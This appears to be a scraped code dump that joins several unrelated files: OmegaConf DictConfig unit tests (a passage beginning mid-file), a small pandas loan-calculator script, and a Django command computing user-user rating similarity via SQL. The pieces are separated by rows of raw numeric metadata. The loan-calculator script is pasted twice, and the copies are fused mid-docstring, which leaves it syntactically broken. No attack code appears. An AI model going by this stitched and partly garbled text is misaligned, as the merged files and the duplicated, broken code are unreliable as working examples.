assert python_dict.keys() == cfg.keys()
def test_values(self, python_dict: Any, cfg: Any) -> None:
assert list(python_dict.values()) == list(cfg.values())
def test_items(self, python_dict: Any, cfg: Any) -> None:
assert list(python_dict.items()) == list(cfg.items())
@fixture
def cfg_typed(
python_dict: Any, cfg_key_type: Any, struct_mode: Optional[bool]
) -> DictConfig:
"""Create a DictConfig instance that has strongly-typed keys"""
cfg_typed: DictConfig = DictConfig(content=python_dict, key_type=cfg_key_type)
OmegaConf.set_struct(cfg_typed, struct_mode)
return cfg_typed
@mark.parametrize(
"cfg_key_type,data",
[(str, {"a": 10}), (int, {1: "a"}), (float, {123.45: "a"}), (bool, {True: "a"})],
)
class TestPrimitiveTypeDunderMethods:
"""Compare DictConfig with python dict in the case where key_type is a primitive type."""
def test__setitem__primitive_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
struct_mode: Optional[bool],
) -> None:
"""When DictConfig keys are strongly typed,
ensure that __setitem__ has same effect on python dict and on DictConfig."""
if struct_mode and key not in cfg_typed:
if isinstance(key, cfg_key_type) or (
cfg_key_type == bool and key in (0, 1)
):
with raises(ConfigKeyError):
cfg_typed[key] = "sentinel"
else:
with raises(KeyValidationError):
cfg_typed[key] = "sentinel"
else:
python_dict[key] = "sentinel"
if isinstance(key, cfg_key_type) or (
cfg_key_type == bool and key in (0, 1)
):
cfg_typed[key] = "sentinel"
assert python_dict == cfg_typed
else:
with raises(KeyValidationError):
cfg_typed[key] = "sentinel"
def test__getitem__primitive_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""When Dictconfig keys are strongly typed,
ensure that __getitem__ has same result with python dict as with DictConfig."""
try:
result = python_dict[key]
except KeyError:
if isinstance(key, cfg_key_type) or (
cfg_key_type == bool and key in (0, 1)
):
with raises(ConfigKeyError):
cfg_typed[key]
else:
with raises(KeyValidationError):
cfg_typed[key]
else:
assert result == cfg_typed[key]
@mark.parametrize("struct_mode", [False, None])
def test__delitem__primitive_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""When Dictconfig keys are strongly typed,
ensure that __delitem__ has same result with python dict as with DictConfig."""
try:
del python_dict[key]
assert key not in python_dict
except KeyError:
if isinstance(key, cfg_key_type) or (
cfg_key_type == bool and key in (0, 1)
):
with raises(ConfigKeyError):
del cfg_typed[key]
else:
with raises(KeyValidationError):
del cfg_typed[key]
else:
del cfg_typed[key]
assert key not in cfg_typed
@mark.parametrize("struct_mode", [True])
def test__delitem__primitive_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""Ensure ensure that struct-mode __delitem__ raises ConfigTypeError or KeyValidationError"""
if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
with raises(ConfigTypeError):
del cfg_typed[key]
else:
with raises(KeyValidationError):
del cfg_typed[key]
def test__contains__primitive_typed(
self, python_dict: Any, cfg_typed: Any, key: Any
) -> None:
"""Ensure that __contains__ has same result with python dict as with DictConfig."""
assert (key in python_dict) == (key in cfg_typed)
def test__eq__primitive_typed(
self, python_dict: Any, cfg_typed: Any, key: Any
) -> None:
assert python_dict == cfg_typed
def test_get_primitive_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
assert python_dict.get(key) == cfg_typed.get(key)
else:
with raises(KeyValidationError):
cfg_typed.get(key)
def test_get_with_default_primitive_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
assert python_dict.get(key, "DEFAULT") == cfg_typed.get(key, "DEFAULT")
else:
with raises(KeyValidationError):
cfg_typed.get(key, "DEFAULT")
@mark.parametrize("struct_mode", [False, None])
def test_pop_primitive_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop has same result with python dict as with DictConfig."""
if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
try:
result = python_dict.pop(key)
except KeyError:
with raises(ConfigKeyError):
cfg_typed.pop(key)
else:
assert result == cfg_typed.pop(key)
assert python_dict.keys() == cfg_typed.keys()
else:
with raises(KeyValidationError):
cfg_typed.pop(key)
@mark.parametrize("struct_mode", [True])
def test_pop_primitive_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop fails in struct mode."""
with raises(ConfigTypeError):
cfg_typed.pop(key)
@mark.parametrize("struct_mode", [False, None])
def test_pop_with_default_primitive_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) has same result with python dict as with DictConfig."""
if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
assert python_dict.pop(key, "DEFAULT") == cfg_typed.pop(key, "DEFAULT")
assert python_dict.keys() == cfg_typed.keys()
else:
with raises(KeyValidationError):
cfg_typed.pop(key, "DEFAULT")
@mark.parametrize("struct_mode", [True])
def test_pop_with_default_primitive_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) fails in struct mode"""
with raises(ConfigTypeError):
cfg_typed.pop(key)
def test_keys_primitive_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert python_dict.keys() == cfg_typed.keys()
def test_values_primitive_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert list(python_dict.values()) == list(cfg_typed.values())
def test_items_primitive_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert list(python_dict.items()) == list(cfg_typed.items())
@mark.parametrize("cfg_key_type,data", [(Enum1, {Enum1.FOO: "foo"})])
class TestEnumTypeDunderMethods:
"""Compare DictConfig with python dict in the case where key_type is an Enum type."""
@fixture
def key_coerced(self, key: Any, cfg_key_type: Any) -> Any:
"""
This handles key coersion in the special case where DictConfig key_type
is a subclass of Enum: keys of type `str` or `int` are coerced to `key_type`.
See https://github.com/omry/omegaconf/pull/484#issuecomment-765772019
"""
assert issubclass(cfg_key_type, Enum)
if type(key) == str and key in [e.name for e in cfg_key_type]:
return cfg_key_type[key]
elif type(key) == int and key in [e.value for e in cfg_key_type]:
return cfg_key_type(key)
else:
return key
def test__setitem__enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
struct_mode: Optional[bool],
) -> None:
"""When DictConfig keys are strongly typed,
ensure that __setitem__ has same effect on python dict and on DictConfig."""
if struct_mode and key_coerced not in cfg_typed:
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigKeyError):
cfg_typed[key] = "sentinel"
else:
with raises(KeyValidationError):
cfg_typed[key] = "sentinel"
else:
python_dict[key_coerced] = "sentinel"
if isinstance(key_coerced, cfg_key_type):
cfg_typed[key] = "sentinel"
assert python_dict == cfg_typed
else:
with raises(KeyValidationError):
cfg_typed[key] = "sentinel"
def test__getitem__enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""When Dictconfig keys are strongly typed,
ensure that __getitem__ has same result with python dict as with DictConfig."""
try:
result = python_dict[key_coerced]
except KeyError:
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigKeyError):
cfg_typed[key]
else:
with raises(KeyValidationError):
cfg_typed[key]
else:
assert result == cfg_typed[key]
@mark.parametrize("struct_mode", [False, None])
def test__delitem__enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""When Dictconfig keys are strongly typed,
ensure that __delitem__ has same result with python dict as with DictConfig."""
try:
del python_dict[key_coerced]
assert key_coerced not in python_dict
except KeyError:
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigKeyError):
del cfg_typed[key]
else:
with raises(KeyValidationError):
del cfg_typed[key]
else:
del cfg_typed[key]
assert key not in cfg_typed
@mark.parametrize("struct_mode", [True])
def test__delitem__enum_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __delitem__ errors in struct mode"""
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigTypeError):
del cfg_typed[key]
else:
with raises(KeyValidationError):
del cfg_typed[key]
def test__contains__enum_typed(
self, python_dict: Any, cfg_typed: Any, key: Any, key_coerced: Any
) -> None:
"""Ensure that __contains__ has same result with python dict as with DictConfig."""
assert (key_coerced in python_dict) == (key in cfg_typed)
def test__eq__enum_typed(self, python_dict: Any, cfg_typed: Any, key: Any) -> None:
assert python_dict == cfg_typed
def test_get_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
assert python_dict.get(key_coerced) == cfg_typed.get(key)
else:
with raises(KeyValidationError):
cfg_typed.get(key)
def test_get_with_default_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
assert python_dict.get(key_coerced, "DEFAULT") == cfg_typed.get(
key, "DEFAULT"
)
else:
with raises(KeyValidationError):
cfg_typed.get(key, "DEFAULT")
@mark.parametrize("struct_mode", [False, None])
def test_pop_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
try:
result = python_dict.pop(key_coerced)
except KeyError:
with raises(ConfigKeyError):
cfg_typed.pop(key)
else:
assert result == cfg_typed.pop(key)
assert python_dict.keys() == cfg_typed.keys()
else:
with raises(KeyValidationError):
cfg_typed.pop(key)
@mark.parametrize("struct_mode", [True])
def test_pop_enum_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop fails in struct mode"""
with raises(ConfigTypeError):
cfg_typed.pop(key)
@mark.parametrize("struct_mode", [False, None])
def test_pop_with_default_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
assert python_dict.pop(key_coerced, "DEFAULT") == cfg_typed.pop(
key, "DEFAULT"
)
assert python_dict.keys() == cfg_typed.keys()
else:
with raises(KeyValidationError):
cfg_typed.pop(key, "DEFAULT")
@mark.parametrize("struct_mode", [True])
def test_pop_with_default_enum_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) errors in struct mode"""
with raises(ConfigTypeError):
cfg_typed.pop(key)
def test_keys_enum_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert python_dict.keys() == cfg_typed.keys()
def test_values_enum_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert list(python_dict.values()) == list(cfg_typed.values())
def test_items_enum_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert list(python_dict.items()) == list(cfg_typed.items())
| 34.496914
| 101
| 0.594659
| 2,688
| 22,354
| 4.695313
| 0.056548
| 0.099041
| 0.045163
| 0.06196
| 0.842881
| 0.827351
| 0.805324
| 0.786784
| 0.775374
| 0.76444
| 0
| 0.003745
| 0.307238
| 22,354
| 647
| 102
| 34.550232
| 0.811249
| 0.167039
| 0
| 0.740741
| 0
| 0
| 0.027067
| 0
| 0
| 0
| 0
| 0
| 0.089669
| 1
| 0.099415
| false
| 0
| 0.013645
| 0
| 0.134503
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3397440c72e7652238f4c51ffed77b5f3e8f18d9
| 5,613
|
py
|
Python
|
loan-calculator.py
|
jacobmask/loanCalculatorProgram
|
be6f3497742c1f1c8a0b0c007137406f1ec13fea
|
[
"MIT"
] | 1
|
2021-06-05T20:00:33.000Z
|
2021-06-05T20:00:33.000Z
|
loan-calculator.py
|
jacobmask/loanCalculatorProgram
|
be6f3497742c1f1c8a0b0c007137406f1ec13fea
|
[
"MIT"
] | null | null | null |
loan-calculator.py
|
jacobmask/loanCalculatorProgram
|
be6f3497742c1f1c8a0b0c007137406f1ec13fea
|
[
"MIT"
] | null | null | null |
"""
Author: Jacob Mask
Created: 6/5/2021
Modified: 6/5/2021
Notes: An app that calculates multiple monthly loan payments.
"""
import pandas as pd
import os
import time
def main():
if os.path.exists("data.csv"):
print("Loading your data")
UI()
else:
print("Welcome new user")
print("Creating a data.csv file for your storage")
dataFile = open("data.csv", "w+")
dataFile.close()
firstTimeUI()
def firstTimeUI():
loans = {}
loanName = input("Enter loan name: ")
print("Insert the yearly interest rate without symbols")
interest = input("Example: 2.5 not .025: ")
amount = input("Total amount of loan: ")
loans[loanName] = [amount, interest]
data = [[loanName, amount, interest]]
df = pd.DataFrame(data, columns = ['Name', 'Amount', 'Interest'])
print(df)
df.to_csv("data.csv")
print("Congrats on inserting your first loan!")
UI()
def UI():
entry = "null"
while entry != "Z":
print("Type a letter from the below options")
print("A: View Loans")
print("B: Change/Add/Remove loans")
print("C: Calculator")
#print("D: Payments Simulator")
print("Y: Restart program")
print("Z: Close program")
entry = input("Type a single letter: ")
if entry == "A" or entry == "a":
viewLoans()
elif entry == "B" or entry == "b":
changeLoans()
elif entry == "C" or entry == "c":
calculator()
elif entry == "Y" or entry == "y":
main()
elif entry == "Z" or entry == "z":
exit()
else:
print("\nEntry invalid, try again.\n")
def viewLoans():
df = pd.read_csv("data.csv")
var = df.iloc[0:10000, 1:4]
print(var)
def changeLoans():
entry = "null"
while entry != "Z":
print("\n\n\nUpdate Loan Options:")
print("A: Add a loan")
print("B: Update a loan")
print("C: Delete a loan")
print("Z: Back to main menu")
entry = input("Type a single letter: ")
if entry == "A" or entry == "a":
addLoan()
elif entry == "B" or entry == "b":
updateLoan()
elif entry == "C" or entry == "c":
deleteLoan()
elif entry == "Z" or entry == "z":
UI()
else:
print("\nEntry invalid, try again\n")
def addLoan():
print("test1")
def updateLoan():
print("Test2")
def deleteLoan():
print("Test4")
def calculator():
print("TESt3")
if __name__ == '__main__':
main()"""
Author: Jacob Mask
Created: 6/5/2021
Modified: 6/5/2021
Notes: An app that calculates multiple monthly loan payments.
"""
import pandas as pd
import os
import time
def main():
if os.path.exists("data.csv"):
print("Loading your data")
UI()
else:
print("Welcome new user")
print("Creating a data.csv file for your storage")
dataFile = open("data.csv", "w+")
dataFile.close()
firstTimeUI()
def firstTimeUI():
loanName = input("Enter loan name: ")
print("Insert the yearly interest rate without symbols")
interest = input("Example: 2.5 not .025: ")
amount = input("Total amount of loan: ")
data = [[loanName, amount, interest]]
df = pd.DataFrame(data, columns = ['Name', 'Amount', 'Interest'])
print(df)
df.to_csv("data.csv",index=False)
print("Congrats on inserting your first loan!")
UI()
def UI():
entry = "null"
while entry != "Z":
print("Type a letter from the below options")
print("A: View Loans")
print("B: Change/Add/Remove loans")
print("C: Calculator")
#print("D: Payments Simulator")
print("Y: Restart program")
print("Z: Close program")
entry = input("Type a single letter: ")
if entry == "A" or entry == "a":
viewLoans()
elif entry == "B" or entry == "b":
changeLoans()
elif entry == "C" or entry == "c":
calculator()
elif entry == "Y" or entry == "y":
main()
elif entry == "Z" or entry == "z":
exit()
else:
print("\nEntry invalid, try again.\n")
def viewLoans():
df = pd.read_csv("data.csv")
print(df)
def changeLoans():
entry = "null"
while entry != "Z":
print("\n\n\nUpdate Loan Options:")
print("A: Add a loan")
print("B: Update a loan")
print("C: Delete a loan")
print("Z: Back to main menu")
entry = input("Type a single letter: ")
if entry == "A" or entry == "a":
addLoan()
elif entry == "B" or entry == "b":
updateLoan()
elif entry == "C" or entry == "c":
deleteLoan()
elif entry == "Z" or entry == "z":
UI()
else:
print("\nEntry invalid, try again\n")
def addLoan():
df = pd.read_csv("data.csv")
print('\n',df,'\n')
loanName = input("Enter loan name: ")
print("Insert the yearly interest rate without symbols")
interest = input("Example: 2.5 not .025: ")
amount = input("Total amount of loan: ")
df2 = pd.DataFrame([[loanName, amount, interest]], columns=['Name','Amount','Interest'])
frames = [df, df2]
df = pd.concat(frames)
df.to_csv("data.csv", index=False)
print('\n',df,'\n')
def updateLoan():
print("Not yet complete")
def deleteLoan():
print("Not yet complete")
def calculator():
print("Not yet complete")
if __name__ == '__main__':
main()
| 26.601896
| 92
| 0.543916
| 704
| 5,613
| 4.305398
| 0.18892
| 0.04157
| 0.019795
| 0.025074
| 0.896404
| 0.881887
| 0.881887
| 0.872649
| 0.859782
| 0.859782
| 0
| 0.013496
| 0.300374
| 5,613
| 210
| 93
| 26.728571
| 0.75834
| 0.010689
| 0
| 0.896552
| 0
| 0
| 0.291928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.034483
| null | null | 0.287356
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
33dc673bc291dae2f719e48b667a043253fb4750
| 10,130
|
py
|
Python
|
ktapp/management/commands/calculate_uur.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 5
|
2015-04-13T09:44:31.000Z
|
2017-10-19T01:07:58.000Z
|
ktapp/management/commands/calculate_uur.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 49
|
2015-02-15T07:12:05.000Z
|
2022-03-11T23:11:43.000Z
|
ktapp/management/commands/calculate_uur.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | null | null | null |
import datetime
import random
from django.core.management.base import BaseCommand
from django.db import connection
from ktapp import models
INSERT_SQL_TEMPLATE_1 = '''
INSERT INTO ktapp_useruserrating (
user_1_id, user_2_id, keyword_id,
number_of_ratings,
similarity,
last_calculated_at
)
VALUES(%s, %s, %s, %s, %s, %s)
'''
INSERT_SQL_TEMPLATE_2 = '''
INSERT INTO ktapp_useruserrating (
user_2_id, user_1_id, keyword_id,
number_of_ratings,
similarity,
last_calculated_at
)
VALUES(%s, %s, %s, %s, %s, %s)
'''
GENERIC_SIMILARITY_TEMPLATE = '''
SELECT
user_1_id, user_2_id, keyword_id,
number_of_ratings,
ROUND(1.0 * (
100 * number_of_ratings_11 +
85 * number_of_ratings_12 +
50 * number_of_ratings_13 +
15 * number_of_ratings_14 +
0 * number_of_ratings_15 +
85 * number_of_ratings_21 +
100 * number_of_ratings_22 +
65 * number_of_ratings_23 +
30 * number_of_ratings_24 +
15 * number_of_ratings_25 +
50 * number_of_ratings_31 +
65 * number_of_ratings_32 +
100 * number_of_ratings_33 +
65 * number_of_ratings_34 +
50 * number_of_ratings_35 +
15 * number_of_ratings_41 +
30 * number_of_ratings_42 +
65 * number_of_ratings_43 +
100 * number_of_ratings_44 +
85 * number_of_ratings_45 +
0 * number_of_ratings_51 +
15 * number_of_ratings_52 +
50 * number_of_ratings_53 +
85 * number_of_ratings_54 +
100 * number_of_ratings_55
) / number_of_ratings) AS similarity,
%s AS last_calculated_at
FROM (
SELECT
v1.user_id AS user_1_id, v2.user_id AS user_2_id, NULL AS keyword_id,
COUNT(1) AS number_of_ratings,
SUM(v1.rating = 1 AND v2.rating = 1) AS number_of_ratings_11,
SUM(v1.rating = 1 AND v2.rating = 2) AS number_of_ratings_12,
SUM(v1.rating = 1 AND v2.rating = 3) AS number_of_ratings_13,
SUM(v1.rating = 1 AND v2.rating = 4) AS number_of_ratings_14,
SUM(v1.rating = 1 AND v2.rating = 5) AS number_of_ratings_15,
SUM(v1.rating = 2 AND v2.rating = 1) AS number_of_ratings_21,
SUM(v1.rating = 2 AND v2.rating = 2) AS number_of_ratings_22,
SUM(v1.rating = 2 AND v2.rating = 3) AS number_of_ratings_23,
SUM(v1.rating = 2 AND v2.rating = 4) AS number_of_ratings_24,
SUM(v1.rating = 2 AND v2.rating = 5) AS number_of_ratings_25,
SUM(v1.rating = 3 AND v2.rating = 1) AS number_of_ratings_31,
SUM(v1.rating = 3 AND v2.rating = 2) AS number_of_ratings_32,
SUM(v1.rating = 3 AND v2.rating = 3) AS number_of_ratings_33,
SUM(v1.rating = 3 AND v2.rating = 4) AS number_of_ratings_34,
SUM(v1.rating = 3 AND v2.rating = 5) AS number_of_ratings_35,
SUM(v1.rating = 4 AND v2.rating = 1) AS number_of_ratings_41,
SUM(v1.rating = 4 AND v2.rating = 2) AS number_of_ratings_42,
SUM(v1.rating = 4 AND v2.rating = 3) AS number_of_ratings_43,
SUM(v1.rating = 4 AND v2.rating = 4) AS number_of_ratings_44,
SUM(v1.rating = 4 AND v2.rating = 5) AS number_of_ratings_45,
SUM(v1.rating = 5 AND v2.rating = 1) AS number_of_ratings_51,
SUM(v1.rating = 5 AND v2.rating = 2) AS number_of_ratings_52,
SUM(v1.rating = 5 AND v2.rating = 3) AS number_of_ratings_53,
SUM(v1.rating = 5 AND v2.rating = 4) AS number_of_ratings_54,
SUM(v1.rating = 5 AND v2.rating = 5) AS number_of_ratings_55
FROM ktapp_vote v1
INNER JOIN ktapp_vote v2 ON v2.film_id = v1.film_id
WHERE v1.user_id = %s
GROUP BY v1.user_id, v2.user_id
HAVING COUNT(1) >= 50
) t
'''
KEYWORD_SIMILARITY_TEMPLATE = '''
SELECT
user_1_id, user_2_id, keyword_id,
number_of_ratings,
ROUND(1.0 * (
100 * number_of_ratings_11 +
85 * number_of_ratings_12 +
50 * number_of_ratings_13 +
15 * number_of_ratings_14 +
0 * number_of_ratings_15 +
85 * number_of_ratings_21 +
100 * number_of_ratings_22 +
65 * number_of_ratings_23 +
30 * number_of_ratings_24 +
15 * number_of_ratings_25 +
50 * number_of_ratings_31 +
65 * number_of_ratings_32 +
100 * number_of_ratings_33 +
65 * number_of_ratings_34 +
50 * number_of_ratings_35 +
15 * number_of_ratings_41 +
30 * number_of_ratings_42 +
65 * number_of_ratings_43 +
100 * number_of_ratings_44 +
85 * number_of_ratings_45 +
0 * number_of_ratings_51 +
15 * number_of_ratings_52 +
50 * number_of_ratings_53 +
85 * number_of_ratings_54 +
100 * number_of_ratings_55
) / number_of_ratings) AS similarity,
%s AS last_calculated_at
FROM (
SELECT
v1.user_id AS user_1_id, v2.user_id AS user_2_id, fk.keyword_id AS keyword_id,
COUNT(1) AS number_of_ratings,
SUM(v1.rating = 1 AND v2.rating = 1) AS number_of_ratings_11,
SUM(v1.rating = 1 AND v2.rating = 2) AS number_of_ratings_12,
SUM(v1.rating = 1 AND v2.rating = 3) AS number_of_ratings_13,
SUM(v1.rating = 1 AND v2.rating = 4) AS number_of_ratings_14,
SUM(v1.rating = 1 AND v2.rating = 5) AS number_of_ratings_15,
SUM(v1.rating = 2 AND v2.rating = 1) AS number_of_ratings_21,
SUM(v1.rating = 2 AND v2.rating = 2) AS number_of_ratings_22,
SUM(v1.rating = 2 AND v2.rating = 3) AS number_of_ratings_23,
SUM(v1.rating = 2 AND v2.rating = 4) AS number_of_ratings_24,
SUM(v1.rating = 2 AND v2.rating = 5) AS number_of_ratings_25,
SUM(v1.rating = 3 AND v2.rating = 1) AS number_of_ratings_31,
SUM(v1.rating = 3 AND v2.rating = 2) AS number_of_ratings_32,
SUM(v1.rating = 3 AND v2.rating = 3) AS number_of_ratings_33,
SUM(v1.rating = 3 AND v2.rating = 4) AS number_of_ratings_34,
SUM(v1.rating = 3 AND v2.rating = 5) AS number_of_ratings_35,
SUM(v1.rating = 4 AND v2.rating = 1) AS number_of_ratings_41,
SUM(v1.rating = 4 AND v2.rating = 2) AS number_of_ratings_42,
SUM(v1.rating = 4 AND v2.rating = 3) AS number_of_ratings_43,
SUM(v1.rating = 4 AND v2.rating = 4) AS number_of_ratings_44,
SUM(v1.rating = 4 AND v2.rating = 5) AS number_of_ratings_45,
SUM(v1.rating = 5 AND v2.rating = 1) AS number_of_ratings_51,
SUM(v1.rating = 5 AND v2.rating = 2) AS number_of_ratings_52,
SUM(v1.rating = 5 AND v2.rating = 3) AS number_of_ratings_53,
SUM(v1.rating = 5 AND v2.rating = 4) AS number_of_ratings_54,
SUM(v1.rating = 5 AND v2.rating = 5) AS number_of_ratings_55
FROM ktapp_vote v1
INNER JOIN ktapp_vote v2 ON v2.film_id = v1.film_id
INNER JOIN ktapp_filmkeywordrelationship fk ON fk.film_id = v1.film_id
WHERE v1.user_id = %s
AND fk.keyword_id IN (3,27,29,32,39,54,55,56,62,76,95,107,112,120,171,174,212,250,314,332,368,612,674,954,1229,1264,1265,1323,1672,4150)
GROUP BY v1.user_id, v2.user_id, fk.keyword_id
HAVING COUNT(1) >= 30
) t
'''
class Command(BaseCommand):
help = 'Calculate user-user recommendation'
def add_arguments(self, parser):
parser.add_argument('user_id', nargs='*', type=int)
def calculate_uur(self, user_id):
self.stdout.write('Refreshing user-user recommendation for user %d...' % user_id)
now = datetime.datetime.now()
self.stdout.write('Calculating generic...')
benchmark_now = datetime.datetime.now()
self.cursor.execute(GENERIC_SIMILARITY_TEMPLATE, (now, user_id))
general_similarity = [row for row in self.cursor.fetchall()]
self.stdout.write('Calculated in %d sec.' % (datetime.datetime.now() - benchmark_now).total_seconds())
self.stdout.write('Updating generic...')
benchmark_now = datetime.datetime.now()
self.cursor.execute('''DELETE FROM ktapp_useruserrating WHERE user_1_id = %d AND keyword_id IS NULL''' % user_id)
self.cursor.execute('''DELETE FROM ktapp_useruserrating WHERE user_2_id = %d AND keyword_id IS NULL''' % user_id)
for row in general_similarity:
self.cursor.execute(INSERT_SQL_TEMPLATE_1, row)
if row[0] != row[1]:
self.cursor.execute(INSERT_SQL_TEMPLATE_2, row)
self.stdout.write('Updated in %d sec.' % (datetime.datetime.now() - benchmark_now).total_seconds())
self.stdout.write('Calculating keyword...')
benchmark_now = datetime.datetime.now()
self.cursor.execute(KEYWORD_SIMILARITY_TEMPLATE, (now, user_id))
general_similarity = [row for row in self.cursor.fetchall()]
self.stdout.write('Calculated in %d sec.' % (datetime.datetime.now() - benchmark_now).total_seconds())
self.stdout.write('Updating keyword...')
benchmark_now = datetime.datetime.now()
self.cursor.execute('''DELETE FROM ktapp_useruserrating WHERE user_1_id = %d AND keyword_id IS NOT NULL''' % user_id)
self.cursor.execute('''DELETE FROM ktapp_useruserrating WHERE user_2_id = %d AND keyword_id IS NOT NULL''' % user_id)
for row in general_similarity:
self.cursor.execute(INSERT_SQL_TEMPLATE_1, row)
if row[0] != row[1]:
self.cursor.execute(INSERT_SQL_TEMPLATE_2, row)
self.stdout.write('Updated in %d sec.' % (datetime.datetime.now() - benchmark_now).total_seconds())
connection.commit()
u = models.KTUser.objects.get(id=user_id)
u.last_uur_calculation_at = now
u.save()
self.stdout.write('Refreshed user-user recommendation for user %d in %f sec.' % (
user_id,
(datetime.datetime.now() - now).total_seconds(),
))
def handle(self, *args, **options):
self.cursor = connection.cursor()
if options['user_id']:
for user_id in options['user_id']:
self.calculate_uur(user_id)
else:
a_year_ago = datetime.date.today() - datetime.timedelta(days=365)
a_month_ago = datetime.date.today() - datetime.timedelta(days=30)
try:
if random.random() < 0.1:
# relatively new users: less than a year
selected_user_id = models.KTUser.objects.filter(last_activity_at__gte=a_month_ago, date_joined__gte=a_year_ago, number_of_ratings__gte=50).only('id').order_by('?')[0].id
else:
# relatively old users
selected_user_id = models.KTUser.objects.filter(last_activity_at__gte=a_month_ago, date_joined__lt=a_year_ago, number_of_ratings__gte=100).only('id').order_by('?')[0].id
except Exception:
return
self.calculate_uur(selected_user_id)
| 42.033195
| 189
| 0.695459
| 1,686
| 10,130
| 3.879597
| 0.114472
| 0.134536
| 0.252255
| 0.135148
| 0.845895
| 0.832442
| 0.818376
| 0.79789
| 0.790858
| 0.7719
| 0
| 0.081414
| 0.198519
| 10,130
| 240
| 190
| 42.208333
| 0.724227
| 0.005824
| 0
| 0.731818
| 0
| 0.004545
| 0.672924
| 0.114422
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013636
| false
| 0
| 0.022727
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1d4d24dce6eedf7a4e9943061beca1a1eb180677
| 616
|
py
|
Python
|
